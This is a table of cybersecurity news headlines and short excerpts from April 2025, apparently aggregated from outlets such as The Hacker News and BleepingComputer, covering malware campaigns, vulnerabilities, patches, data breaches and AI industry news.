| 16.4.25 | U.S. Govt. Funding for MITRE's CVE Ends April 16, Cybersecurity Community on Alert | The U.S. government funding for non-profit research giant MITRE to operate and maintain its Common Vulnerabilities and Exposures ( CVE ) program will expire | BigBrothers | The Hacker News |
| 16.4.25 | Chinese Hackers Target Linux Systems Using SNOWLIGHT Malware and VShell Tool | The China-linked threat actor known as UNC5174 has been attributed to a new campaign that leverages a variant of a known malware dubbed SNOWLIGHT and a | Virus | The Hacker News |
| 16.4.25 | Critical Apache Roller Vulnerability (CVSS 10.0) Enables Unauthorized Session Persistence | A critical security vulnerability has been disclosed in the Apache Roller open-source, Java-based blogging server software that could allow malicious actors to retain | Vulnerebility | The Hacker News |
| 16.4.25 | Malicious PyPI Package Targets MEXC Trading API to Steal Credentials and Redirect Orders | Cybersecurity researchers have disclosed a malicious package uploaded to the Python Package Index (PyPI) repository that's designed to reroute trading orders | Hack | The Hacker News |
| 15.4.25 | Majority of Browser Extensions Can Access Sensitive Enterprise Data, New Report Finds | Everybody knows browser extensions are embedded into nearly every user's daily workflow, from spell checkers to GenAI tools. What most IT and security people | Security | The Hacker News |
| 15.4.25 | Crypto Developers Targeted by Python Malware Disguised as Coding Challenges | The North Korea-linked threat actor assessed to be behind the massive Bybit hack in February 2025 has been linked to a malicious campaign that targets developers | APT | The Hacker News |
| 15.4.25 | Gladinet's Triofox and CentreStack Under Active Exploitation via Critical RCE Vulnerability | A recently disclosed security flaw in Gladinet CentreStack also impacts its Triofox remote access and collaboration solution, according to Huntress, with seven | Exploit | The Hacker News |
| 15.4.25 | Meta Resumes E.U. AI Training Using Public User Data After Regulator Approval | Meta has announced that it will begin to train its artificial intelligence (AI) models using public data shared by adults across its platforms in the European Union, | AI | The Hacker News |
| 15.4.25 | ResolverRAT Campaign Targets Healthcare, Pharma via Phishing and DLL Side-Loading | Cybersecurity researchers have discovered a new, sophisticated remote access trojan called ResolverRAT that has been observed in attacks targeting healthcare | Virus | The Hacker News |
| 15.4.25 | Phishing Campaigns Use Real-Time Checks to Validate Victim Emails Before Credential Theft | Cybersecurity researchers are calling attention to a new type of credential phishing scheme that ensures that the stolen information is associated with valid online | Phishing | The Hacker News |
| 15.4.25 | Pakistan-Linked Hackers Expand Targets in India with CurlBack RAT and Spark RAT | A threat actor with ties to Pakistan has been observed targeting various sectors in India with various remote access trojans like Xeno RAT, Spark RAT, and a previously | Virus | The Hacker News |
| 13.4.25 | Leak confirms OpenAI's GPT 4.1 is coming before GPT 5.0 | OpenAI is working on yet another AI model reportedly called GPT-4.1, a successor to GPT-4o, which is expected to come before GPT 5.0 | AI | BleepingComputer |
| 13.4.25 | Tycoon2FA phishing kit targets Microsoft 365 with new tricks | Phishing-as-a-service (PhaaS) platform Tycoon2FA, known for bypassing multi-factor authentication on Microsoft 365 and Gmail accounts, has received updates that improve its stealth and evasion capabilities. | Phishing | |
| 13.4.25 | AI-hallucinated code dependencies become new supply chain risk | A new class of supply chain attacks named 'slopsquatting' has emerged from the increased use of generative AI tools for coding and the model's tendency to "hallucinate" non-existent package names. | AI | BleepingComputer |
| 13.4.25 | Microsoft Defender will isolate undiscovered endpoints to block attacks | Microsoft is testing a new Defender for Endpoint capability that will block traffic to and from undiscovered endpoints to thwart attackers' lateral network movement attempts. | OS | |
| 13.4.25 | Western Sydney University discloses security breaches, data leak | Western Sydney University (WSU) announced two security incidents that exposed personal information belonging to members of its community. | Incindent | |
| 13.4.25 | Fortinet: Hackers retain access to patched FortiGate VPNs using symlinks | Fortinet warns that threat actors use a post-exploitation technique that helps them maintain read-only access to previously compromised FortiGate VPN devices even after the original attack vector was patched. | Vulnerebility | |
| 13.4.25 | Microsoft: Windows 'inetpub' folder created by security fix, don’t delete | Microsoft has now confirmed that an April 2025 Windows security update is creating a new empty "inetpub" folder and warned users not to delete it. | OS | |
| 13.4.25 | Google's AI video generator Veo 2 is rolling out on AI Studio | Google's AI video generator tool Veo 2, which is the company's take on OpenAI's Sora, is now rolling out to some users in the United States. | AI | BleepingComputer |
| 13.4.25 | US lab testing provider exposed health data of 1.6 million people | Laboratory Services Cooperative (LSC) has released a statement informing it suffered a data breach where hackers stole sensitive information of roughly 1.6 million people from its systems. | Incindent | BleepingComputer |
| 13.4.25 | Campaign Targets Amazon EC2 Instance Metadata via SSRF | Discover the latest CVE trends and a new campaign targeting websites hosted in EC2 instances on AWS. | Vulnerebility blog | F5 |
| 13.4.25 | Microsoft says Edge browser is now 9% faster after optimizations | Microsoft claims its Chromium-based Microsoft Edge has seen up to 9% performance improvements following the release of version 134. | OS | |
| 13.4.25 | Ransomware attack cost IKEA operator in Eastern Europe $23 million | Fourlis Group, the operator of IKEA stores in Greece, Cyprus, Romania, and Bulgaria, has informed that the ransomware attack it suffered just before Black Friday on November 27, 2024, caused losses estimated to €20 million ($22.8M). | Ransom | |
| 13.4.25 | Hackers exploit WordPress plugin auth bypass hours after disclosure | Hackers started exploiting a high-severity flaw that allows bypassing authentication in the OttoKit (formerly SureTriggers) plugin for WordPress just hours after public disclosure. | Exploit | |
| 13.4.25 | Microsoft releases emergency update to fix Office 2016 crashes | Microsoft has released an out-of-band Office update to fix a known issue that caused Word, Excel, and Outlook to crash after installing the KB5002700 security update for Office 2016. | OS | |
| 13.4.25 | OpenAI wants ChatGPT to 'know you over your life' with new Memory update | OpenAI is giving ChatGPT's memory feature its biggest upgrade yet, allowing the AI to know you better by referencing all your past conversations. | AI | BleepingComputer |
| 13.4.25 | Russian hackers attack Western military mission using malicious drive | The Russian state-backed hacking group Gamaredon (aka "Shuckworm") has been targeting a military mission of a Western country in Ukraine in attacks likely deployed from removable drives. | BigBrothers | BleepingComputer |
| 13.4.25 | Sensata Technologies hit by ransomware attack impacting operations | Sensata Technologies (known as Sensata) has suffered a ransomware attack last weekend that encrypted parts of the company network and disrupted operations. | Ransom | BleepingComputer |
| 13.4.25 | ChatGPT's o4-mini, o4-mini-high and o3 spotted ahead of release | OpenAI is preparing to launch as many as three new AI models, possibly called "o4-mini", "o4-mini-high" and "o3". | AI | BleepingComputer |
| 13.4.25 | Google takes on Cursor with Firebase Studio, its AI builder for vibe coding | Google has quietly launched Firebase Studio, which is a cloud-based AI-powered integrated development environment that lets you build full-fledged apps using prompts. | AI | BleepingComputer |
| 13.4.25 | Hackers target SSRF bugs in EC2-hosted sites to steal AWS credentials | A targeted campaign exploited Server-Side Request Forgery (SSRF) vulnerabilities in websites hosted on AWS EC2 instances to extract EC2 Metadata, which could include Identity and Access Management (IAM) credentials from the IMDSv1 endpoint. | Hack | BleepingComputer |
| 13.4.25 | Oracle says "obsolete servers" hacked, denies cloud breach | Oracle finally confirmed in email notifications sent to customers that a hacker stole and leaked credentials that were stolen from what it described as "two obsolete servers." | Incindent | BleepingComputer |
| 13.4.25 | Windows 11 April update unexpectedly creates new 'inetpub' folder | Microsoft's April 2025 Patch Tuesday updates are strangely creating an empty "inetpub" folder in the root of the C:\ drive, even on systems that do not have Internet Information Services (IIS) installed. | OS | BleepingComputer |
| 13.4.25 | Critical FortiSwitch flaw lets hackers change admin passwords remotely | Fortinet has released security patches for a critical vulnerability in its FortiSwitch devices that can be exploited to change administrator passwords remotely. | Vulnerebility | BleepingComputer |
| 12.4.25 | CentreStack RCE exploited as zero-day to breach file sharing servers | Hackers exploited a vulnerability in Gladinet CentreStack's secure file-sharing software as a zero-day since March to breach storage servers | Exploit | |
| 12.4.25 | Who's calling? The threat of AI-powered vishing attacks | AI is making voice phishing (vishing) more dangerous than ever, with scammers cloning voices in seconds to trick employees into handing over their credentials. Learn how to defend your organization with Specops Secure Service Desk. | AI | |
| 12.4.25 | Microsoft: April 2025 updates break Windows Hello on some PCs | Microsoft says some Windows users might be unable to log into their accounts via Windows Hello after installing the April 2025 security updates. | OS | |
| 12.4.25 | Phishing kits now vet victims in real-time before stealing credentials | Phishing actors are employing a new evasion tactic called 'Precision-Validated Phishing' that only shows fake login forms when a user enters an email address that the threat actors specifically targeted. | Phishing | |
| 12.4.25 | Police detains Smokeloader malware customers, seizes servers | In follow-up activity for Operation Endgame, law enforcement tracked down Smokeloader botnet's customers and detained at least five individuals. | Virus | BleepingComputer |
| 12.4.25 | Fake Microsoft Office add-in tools push malware via SourceForge | Threat actors are abusing SourceForge to distribute fake Microsoft add-ins that install malware on victims' computers to both mine and steal cryptocurrency. | Virus | BleepingComputer |
| 12.4.25 | Microsoft fixes auth issues on Windows Server, Windows 11 24H2 | Microsoft has fixed a known issue causing authentication problems when Credential Guard is enabled on systems using the Kerberos PKINIT pre-auth security protocol. | OS | BleepingComputer |
| 12.4.25 | Microsoft: Windows CLFS zero-day exploited by ransomware gang | Microsoft says the RansomEXX ransomware gang has been exploiting a high-severity zero-day flaw in the Windows Common Log File System to gain SYSTEM privileges on victims' systems. | OS | BleepingComputer |
| 12.4.25 | Microsoft April 2025 Patch Tuesday fixes exploited zero-day, 134 flaws | Today is Microsoft's April 2025 Patch Tuesday, which includes security updates for 134 flaws, including one actively exploited zero-day vulnerability. | OS | BleepingComputer |
| 12.4.25 | Windows 10 KB5055518 update fixes random text when printing | Microsoft has released the KB5055518 cumulative update for Windows 10 22H2 and Windows 10 21H2, with nine changes or fixes. | OS | BleepingComputer |
| 12.4.25 | Windows 11 KB5055523 & KB5055528 cumulative updates released | Microsoft has released Windows 11 KB5055523 and KB5055528 cumulative updates for versions 24H2 and 23H2 to fix security vulnerabilities and issues. | OS | BleepingComputer |
| 12.4.25 | Hackers lurked in Treasury OCC’s systems since June 2023 breach | Unknown attackers who breached the Treasury's Office of the Comptroller of the Currency (OCC) in June 2023 gained access to over 150,000 emails. | Incindent | BleepingComputer |
| 12.4.25 | WhatsApp flaw can let attackers run malicious code on Windows PCs | Meta warned Windows users to update the WhatsApp messaging app to the latest version to patch a vulnerability that can let attackers execute malicious code on their devices. | Social | BleepingComputer |
| 12.4.25 | ICS Vulnerability Report: Energy, Manufacturing Device Fixes Urged by Cyble | Multiple industrial control system (ICS) devices are affected by vulnerabilities carrying severity ratings as high as 9.9. | ICS blog | Cyble |
| 12.4.25 | IT Vulnerability Report: VMware, Microsoft Fixes Urged by Cyble | After investigating recent IT vulnerabilities, Cyble threat researchers identified eight high-priority fixes for security teams. | Vulnerebility blog | Cyble |
| 12.4.25 | Ransomware Attack Levels Remain High as Major Change Looms | March saw a potential leadership shift in ransomware attacks, sustained high attack volumes, and the rise of new threat groups. | Ransom blog | Cyble |
| 12.4.25 | TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications | Cyble analyzes TsarBot, a newly identified Android banking Trojan that employs overlay attacks to target over 750 banking, financial, and cryptocurrency applications worldwide. | Malware blog | Cyble |
| 12.4.25 | Hacktivists Increasingly Target France for Its Diplomatic Efforts | Pro-Russian and pro-Palestinian hacktivist groups share a common adversary in France, leading to coordinated cyberattacks against the country. | BigBrother blog | Cyble |
| 12.4.25 | CVE-2025-24813: Remote Code Execution in Apache Tomcat via Malicious Session Deserialization | CVE-2025-24813: Remote Code Execution in Apache Tomcat via Malicious Session Deserialization Apache Tomcat is a popular, open-source web server and servlet container maintained by the Apache Software Foundation. It provides a reliable and scalable environment for executing Java Servlets... | Vulnerebility blog | Seqrite |
| 12.4.25 | Beware! Fake ‘NextGen mParivahan’ Malware Returns with Enhanced Stealth and Data Theft | Cybercriminals continually refine their tactics, making Android malware more insidious and challenging to detect. A new variant of the fake NextGen mParivahan malware has emerged, following its predecessor’s deceptive strategies but introducing significant enhancements. Previously, attackers exploited the government’s. | Malware blog | Seqrite |
| 12.4.25 | Goodbye HTA, Hello MSI: New TTPs and Clusters of an APT driven by Multi-Platform Attacks | Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now. | APT blog | Seqrite |
| 12.4.25 | Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics | Kimsuky: A Continuous Threat to South Korea with Deceptive Tactics Contents Introduction Infection Chain Initial Findings Campaign 1 Looking into PDF document. Campaign 2 Looking into PDF document. Technical Analysis Campaign 1 & 2 Conclusion Seqrite Protection MITRE ATT&CK... | APT blog | Seqrite |
| 12.4.25 | NEPTUNE RAT : An advanced Windows RAT with System Destruction Capabilities and Password Exfiltration from 270+ Applications | At CYFIRMA, we are committed to providing up-to-date insights into current threats and the tactics used by malicious actors targeting both organizations and individuals. In this report, we will take an in-depth look at the latest version of Neptune RAT, which has been shared on GitHub using a technique involving PowerShell commands: | Malware blog | Cyfirma |
| 12.4.25 | CYFIRMA INDUSTRY REPORT : MATERIALS INDUSTRY | The CYFIRMA Industry Report delivers original cybersecurity insights and telemetry-driven statistics of global industries, covering one sector each week for a quarter. This report focuses on the materials industry, presenting key trends and statistics in an engaging infographic format. | Cyber blog | Cyfirma |
| 12.4.25 | TRACKING RANSOMWARE – MARCH 2025 | In March 2025, ransomware attacks targeted critical industries such as Manufacturing, IT, and Healthcare. Notable groups like Black Basta and Moonstone Sleet evolved new strategies, such as automating brute-force VPN attacks and deploying ransomware-as-a-service models. | Ransom blog | Cyfirma |
| 12.4.25 | Tik-Tok : China’s Digital Weapon System? | U.S. President Donald Trump, once a critic but now a supporter of TikTok, is granting the app’s China-based parent company, ByteDance, a second 75-day extension to finalize a deal that would transfer ownership of TikTok to an American entity. | Social blog | Cyfirma |
| 12.4.25 | Microsoft Announces New Authentication Requirements for High-Volume Senders | There was a lot of buzz in security and messaging circles at the end of 2023 when Google, Yahoo and Apple jointly announced that they were going to start enforcing strict email authentication requirements for bulk email senders. Although the implementation that started in the first quarter of 2024 has been slow to fully ramp up, momentum is building. And the overall trend towards mandatory email authentication is quite clear. | Safety blog | PROOFPOINT |
| 12.4.25 | The Expanding Attack Surface: Why Collaboration Tools Are the New Front Line in Cyberattacks | The modern workplace has expanded beyond email. Attackers now exploit collaboration tools, supplier relationships and human trust to bypass defenses and compromise accounts. This five-part blog series raises awareness around these shifting attack tactics. And it introduces our holistic approach to protecting users. | Spam blog | PROOFPOINT |
| 12.4.25 | Stopping attacks against on-premises Exchange Server and SharePoint Server with AMSI | Exchange Server and SharePoint Server are business-critical assets and considered crown jewels for many organizations, making them attractive targets for attacks. | Attack blog | Microsoft blog |
| 12.4.25 | Incomplete NVIDIA Patch to CVE-2024-0132 Exposes AI Infrastructure and Data to Critical Risks | A previously disclosed vulnerability in NVIDIA Container Toolkit has an incomplete patch, which, if exploited, could put a wide range of AI infrastructure and sensitive data at risk. | AI blog | |
| 12.4.25 | CTEM + CREM: Aligning Your Cybersecurity Strategy | Organizations looking to implement CTEM don’t have to start from scratch. CREM can help you get there faster, with actionable insights, automated workflows, and continuous risk reduction. | Cyber blog | |
| 12.4.25 | GTC 2025: AI, Security & The New Blueprint | From quantum leaps to AI factories, GTC 2025 proved one thing: the future runs on secure foundations. | AI blog | |
| 12.4.25 | Microsoft Security Bulletin Coverage for April 2025 | Microsoft’s April 2025 Patch Tuesday has 123 vulnerabilities, of which 49 are Elevation of Privilege. SonicWall Capture Labs' threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2025 and has produced coverage for ten of the reported vulnerabilities | Vulnerebility blog | SonicWall |
| 12.4.25 | How Prompt Attacks Exploit GenAI and How to Fight Back | Palo Alto Networks has released “Securing GenAI: A Comprehensive Report on Prompt Attacks: Taxonomy, Risks, and Solutions,” which surveys emerging prompt-based attacks on AI applications and AI agents. While generative AI (GenAI) has many valid applications for enterprise productivity, there is also potential for critical security vulnerabilities in AI applications and AI agents. | AI blog | Palo Alto |
| 12.4.25 | Available now: 2024 Year in Review | Download Talos' 2024 Year in Review now, and access key insights on the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks. | Cyber blog | Palo Alto |
| 12.4.25 | Threat actors thrive in chaos | Martin delves into how threat actors exploit chaos, offering insights from Talos' 2024 Year in Review on how to fortify defenses against evolving email lures and frequently targeted vulnerabilities, even amidst economic disruption. | Cyber blog | Palo Alto |
| 12.4.25 | Unraveling the U.S. toll road smishing scams | Cisco Talos has observed a widespread and ongoing financial theft SMS phishing (smishing) campaign since October 2024 that targets toll road users in the United States of America. | Spam blog | Palo Alto |
| 12.4.25 | Microsoft Patch Tuesday for April 2025 — Snort rules and prominent vulnerabilities | Microsoft has released its monthly security update for April of 2025 which includes 126 vulnerabilities affecting a range of products, including 11 that Microsoft has marked as “critical”. | Vulnerebility blog | Palo Alto |
| 12.4.25 | Year in Review: Key vulnerabilities, tools, and shifts in attacker email tactics | From Talos' 2024 Year in Review, here are some findings from the top targeted network device vulnerabilities. We also explore how threat actors are moving away from time sensitive lures in their emails. And finally we reveal the tools that adversaries most heavily utilized last year. | Cyber blog | Palo Alto |
| 12.4.25 | One mighty fine-looking report | Hazel highlights the key findings within Cisco Talos’ 2024 Year in Review (now available for download) and details our active tracking of an ongoing campaign targeting users in Ukraine with malicious LNK files. | BigBrother blog | Palo Alto |
| 12.4.25 | Watch out for these traps lurking in search results | Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results | Cyber blog | Eset |
| 12.4.25 | So your friend has been hacked: Could you be next? | When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe. | Cyber blog | |
| 12.4.25 | 1 billion reasons to protect your identity online | Corporate data breaches are a gateway to identity fraud, but they’re not the only one. Here’s a lowdown on how your personal data could be stolen – and how to make sure it isn’t. | Cyber blog | |
| 12.4.25 | Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit | Fortinet has revealed that threat actors have found a way to maintain read-only access to vulnerable FortiGate devices even after the initial access vector used to | Exploit | The Hacker News |
| 11.4.25 | Paper Werewolf Deploys PowerModul Implant in Targeted Cyberattacks on Russian Sectors | The threat actor known as Paper Werewolf has been observed exclusively targeting Russian entities with a new implant called PowerModul . The activity, | Hack | The Hacker News |
| 11.4.25 | Palo Alto Networks Warns of Brute-Force Attempts Targeting PAN-OS GlobalProtect Gateways | Palo Alto Networks has revealed that it's observing brute-force login attempts against PAN-OS GlobalProtect gateways, days after threat hunters warned of a | Attack | The Hacker News |
| 11.4.25 | SpyNote, BadBazaar, MOONSHINE Malware Target Android and iOS Users via Fake Apps | Cybersecurity researchers have found that threat actors are setting up deceptive websites hosted on newly registered domains to deliver a known Android malware | Virus | The Hacker News |
| 11.4.25 | OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation | A newly disclosed high-severity security flaw impacting OttoKit (formerly SureTriggers) has come under active exploitation within a few hours of public | Exploit | The Hacker News |
| 10.4.25 | New Mirai botnet behind surge in TVT DVR exploitation | A significant spike in exploitation attempts targeting TVT NVMS9000 DVRs has been detected, peaking on April 3, 2025, with over 2,500 unique IPs scanning for vulnerable devices. | BotNet | |
| 10.4.25 | AWS rolls out ML-KEM to secure TLS from quantum threats | Amazon Web Services (AWS) has added support for the ML-KEM post-quantum key encapsulation mechanism to AWS Key Management Service (KMS), AWS Certificate Manager (ACM), and AWS Secrets Manager, making TLS connections more secure. | Safety | |
| 10.4.25 | EncryptHub's dual life: Cybercriminal vs Windows bug-bounty researcher | EncryptHub, a notorious threat actor linked to breaches at 618 organizations, is believed to have reported two Windows zero-day vulnerabilities to Microsoft, revealing a conflicted figure straddling the line between cybercrime and security research. | CyberCrime | |
| 10.4.25 | Microsoft delays WSUS driver sync deprecation indefinitely | Microsoft announced today that, based on customer feedback, it will indefinitely delay removing driver synchronization in Windows Server Update Services (WSUS). | OS | |
| 10.4.25 | Six arrested for AI-powered investment scams that stole $20 million | Spain's police arrested six individuals behind a large-scale cryptocurrency investment scam that used AI tools to generate deepfake ads featuring popular public figures to lure people. | AI | BleepingComputer |
| 10.4.25 | Everest ransomware's dark web leak site defaced, now offline | The dark web leak site of the Everest ransomware gang has apparently been hacked over the weekend by an unknown attacker and is now offline. | Ransom | BleepingComputer |
| 10.4.25 | Google fixes Android zero-days exploited in attacks, 60 other flaws | Google has released patches for 62 vulnerabilities in Android's April 2025 security update, including two zero-days exploited in targeted attacks. | OS | BleepingComputer |
| 10.4.25 | Malicious VSCode extensions infect Windows with cryptominers | Nine VSCode extensions on Microsoft's Visual Studio Code Marketplace pose as legitimate development tools while infecting users with the XMRig cryptominer for Monero. | Cryptocurrency | BleepingComputer |
| 10.4.25 | Food giant WK Kellogg discloses data breach linked to Clop ransomware | US food giant WK Kellogg Co is warning employees and vendors that company data was stolen during the 2024 Cleo data theft attacks. | Incindent | BleepingComputer |
| 10.4.25 | Windows 11 24H2 blocked on PCs with code-obfuscation driver BSODs | Microsoft has introduced a new Windows 11 24H2 safeguard hold for systems running security or enterprise software using SenseShield Technology's sprotect.sys driver. | OS | BleepingComputer |
| 10.4.25 | E-ZPass toll payment texts return in massive phishing wave | An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information. | Phishing | BleepingComputer |
| 10.4.25 | OpenAI tests watermarking for ChatGPT-4o Image Generation model | OpenAI is reportedly testing a new "watermark" for the Image Generation model, which is a part of the ChatGPT 4o model. | AI | BleepingComputer |
| 10.4.25 | Carding tool abusing WooCommerce API downloaded 34K times on PyPI | A newly discovered malicious PyPi package named 'disgrasya' that abuses legitimate WooCommerce stores for validating stolen credit cards has been downloaded over 34,000 times from the open-source package platform. | Cryptocurrency | BleepingComputer |
| 10.4.25 | Incomplete Patch in NVIDIA Toolkit Leaves CVE-2024-0132 Open to Container Escapes | Cybersecurity researchers have detailed a case of an incomplete patch for a previously addressed security flaw impacting the NVIDIA Container Toolkit that, if | Vulnerebility | The Hacker News |
| 10.4.25 | Malicious npm Package Targets Atomic Wallet, Exodus Users by Swapping Crypto Addresses | Threat actors are continuing to upload malicious packages to the npm registry so as to tamper with already-installed local versions of legitimate libraries and | Cryptocurrency | The Hacker News |
| 10.4.25 | Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine | The Russia-linked threat actor known as Gamaredon (aka Shuckworm) has been attributed to a cyber attack targeting a foreign military mission based in Ukraine | BigBrothers | The Hacker News |
| 10.4.25 | Europol Arrests Five SmokeLoader Clients Linked by Seized Database Evidence | Law enforcement authorities have announced that they tracked down the customers of the SmokeLoader malware and detained at least five individuals. "In | BigBrothers | The Hacker News |
| 10.4.25 | AkiraBot Targets 420,000 Sites with OpenAI-Generated Spam, Bypassing CAPTCHA Protections | Cybersecurity researchers have disclosed details of an artificial intelligence (AI) powered platform called AkiraBot that's used to spam website chats, comment | BotNet | The Hacker News |
| 9.4.25 | Lovable AI Found Most Vulnerable to VibeScamming — Enabling Anyone to Build Live Scam Pages | Lovable , a generative artificial intelligence (AI) powered platform that allows for creating full-stack web applications using text-based prompts, has been found to | AI | The Hacker News |
| 9.4.25 | New TCESB Malware Found in Active Attacks Exploiting ESET Security Scanner | A Chinese-affiliated threat actor known for its cyber-attacks in Asia has been observed exploiting a security flaw in security software from ESET to deliver a | Virus | The Hacker News |
| 9.4.25 | PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware | Microsoft has revealed that a now-patched security flaw impacting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware | Exploit | The Hacker News |
| 9.4.25 | CISA Warns of CentreStack's Hard-Coded MachineKey Vulnerability Enabling RCE Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Gladinet CentreStack to its Known | Vulnerebility | The Hacker News |
| 9.4.25 | Microsoft Patches 126 Flaws Including Actively Exploited Windows CLFS Vulnerability | Microsoft has released security fixes to address a massive set of 126 flaws affecting its software products, including one vulnerability that it said has been | Vulnerebility | The Hacker News |
| 9.4.25 | Adobe Patches 11 Critical ColdFusion Flaws Amid 30 Total Vulnerabilities Discovered | Adobe has released security updates to fix a fresh set of security flaws, including multiple critical-severity bugs in ColdFusion versions 2025, 2023 and 2021 that | Vulnerebility | The Hacker News |
| 9.4.25 | Fortinet Urges FortiSwitch Upgrades to Patch Critical Admin Password Change Flaw | Fortinet has released security updates to address a critical security flaw impacting FortiSwitch that could permit an attacker to make unauthorized password | Vulnerebility | The Hacker News |
| 9.4.25 | Amazon EC2 SSM Agent Flaw Patched After Privilege Escalation via Path Traversal | Cybersecurity researchers have disclosed details of a now-patched security flaw in the Amazon EC2 Simple Systems Manager (SSM) Agent that, if successfully | Vulnerebility | The Hacker News |
| 9.4.25 | Cryptocurrency Miner and Clipper Malware Spread via SourceForge Cracked Software Listings | Threat actors have been observed distributing malicious payloads such as cryptocurrency miner and clipper malware via SourceForge , a popular software | Cryptocurrency | The Hacker News |
| 8.4.25 | UAC-0226 Deploys GIFTEDCROOK Stealer via Malicious Excel Files Targeting Ukraine | The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed a new set of cyber attacks targeting Ukrainian institutions with information-stealing | BigBrothers | The Hacker News |
| 8.4.25 | CISA Adds CrushFTP Vulnerability to KEV Catalog Following Confirmed Active Exploitation | A recently disclosed critical security flaw impacting CrushFTP has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known | Vulnerebility | The Hacker News |
| 8.4.25 | Google Releases Android Update to Patch Two Actively Exploited Vulnerabilities | Google has shipped patches for 62 vulnerabilities, two of which it said have been exploited in the wild. The two high-severity vulnerabilities are listed below - CVE- | Vulnerebility | The Hacker News |
| 7.4.25 | CISA and FBI Warn Fast Flux is Powering Resilient Malware, C2, and Phishing Networks | Cybersecurity agencies from Australia, Canada, New Zealand, and the United States have published a joint advisory about the risks associated with a technique | BigBrothers | The Hacker News |
| 7.4.25 | PoisonSeed Exploits CRM Accounts to Launch Cryptocurrency Seed Phrase Poisoning Attacks | A malicious campaign dubbed PoisonSeed is leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email | Cryptocurrency | The Hacker News |
| 6.4.25 | The beginning of the end: the story of Hunters International | Learn about technical details on the ransomware and Storage Software tool, how the criminals use the affiliate panel as well as information on the Hunters International ransomware group from its emergence to the end of the operation. | BigBrother blog | Group-IB |
| 6.4.25 | Microsoft Credits EncryptHub, Hacker Behind 618+ Breaches, for Disclosing Windows Flaws | A likely lone wolf actor behind the EncryptHub persona was acknowledged by Microsoft for discovering and reporting two security flaws in Windows last month, | Vulnerebility | The Hacker News |
| 6.4.25 | Coinbase to fix 2FA account activity entry freaking out users | Coinbase is fixing an incorrect account activity message that freaks out customers and makes them think their credentials were compromised. | Cryptocurrency | |
| 6.4.25 | WinRAR flaw bypasses Windows Mark of the Web security alerts | A vulnerability in the WinRAR file archiver solution could be exploited to bypass the Mark of the Web (MotW) security warning and execute arbitrary code on a Windows machine. | Vulnerebility | |
| 6.4.25 | Port of Seattle says ransomware breach impacts 90,000 people | Port of Seattle, the U.S. government agency overseeing Seattle's seaport and airport, is notifying roughly 90,000 individuals of a data breach after their personal information was stolen in an August 2024 ransomware attack. | Ransom | |
| 6.4.25 | PoisonSeed phishing campaign behind emails with wallet seed phrases | A large-scale phishing campaign dubbed 'PoisonSeed' compromises corporate email marketing accounts to distribute emails containing crypto seed phrases used to drain cryptocurrency wallets. | Phishing | |
| 6.4.25 | Australian pension funds hit by wave of credential stuffing attacks | Over the weekend, a massive wave of credential stuffing attacks hit multiple large Australian super funds, compromising thousands of members' accounts. | Incindent | BleepingComputer |
| 6.4.25 | Europcar GitLab breach exposes data of up to 200,000 customers | A hacker breached the GitLab repositories of multinational car-rental company Europcar Mobility Group and stole source code for Android and iOS applications, as well as some personal information belonging to up to 200,000 users. | Incindent | BleepingComputer |
| 6.4.25 | OpenAI's $20 ChatGPT Plus is now free for students until the end of May | ChatGPT Plus subscription is now free, but only if you're a student based out of the United States of America and Canada. | AI | BleepingComputer |
| 6.4.25 | Max severity RCE flaw discovered in widely used Apache Parquet | A maximum severity remote code execution (RCE) vulnerability has been discovered impacting all versions of Apache Parquet up to and including 1.15.0. | Vulnerebility | BleepingComputer |
| 6.4.25 | Hunters International shifts from ransomware to pure data extortion | The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to data theft and extortion-only attacks. | Ransom | BleepingComputer |
| 6.4.25 | Microsoft starts testing Windows 11 taskbar icon scaling | Microsoft is testing a new taskbar icon scaling feature that automatically scales down Windows taskbar icons to show more apps when it gets too overcrowded. | OS | |
| 6.4.25 | CISA warns of Fast Flux DNS evasion used by cybercrime gangs | CISA, the FBI, the NSA, and international cybersecurity agencies are calling on organizations and DNS providers to mitigate the "Fast Flux" cybercrime evasion technique used by state-sponsored threat actors and ransomware gangs. | BigBrothers | |
| 6.4.25 | Ivanti patches Connect Secure zero-day exploited since mid-March | Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025. | Vulnerebility | |
| 6.4.25 | Texas State Bar warns of data breach after INC ransomware claims attack | The State Bar of Texas is warning it suffered a data breach after the INC ransomware gang claimed to have breached the organization and began leaking samples of stolen data. | Ransom | BleepingComputer |
| 6.4.25 | Oracle privately confirms Cloud breach to customers | Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a "legacy environment" last used in 2017. | Security | BleepingComputer |
| 6.4.25 | Recent GitHub supply chain attack traced to leaked SpotBugs token | A cascading supply chain attack on GitHub that targeted Coinbase in March has now been traced back to a single token stolen from a SpotBugs workflow, which allowed a threat actor to compromise multiple GitHub projects. | Hack | BleepingComputer |
| 6.4.25 | Genetic data site openSNP to close and delete data over privacy concerns | The openSNP project, a platform for sharing genetic and phenotypic data, will shut down on April 30, 2025, and delete all user submissions over privacy concerns and the risk of misuse by authoritarian governments. | Security | BleepingComputer |
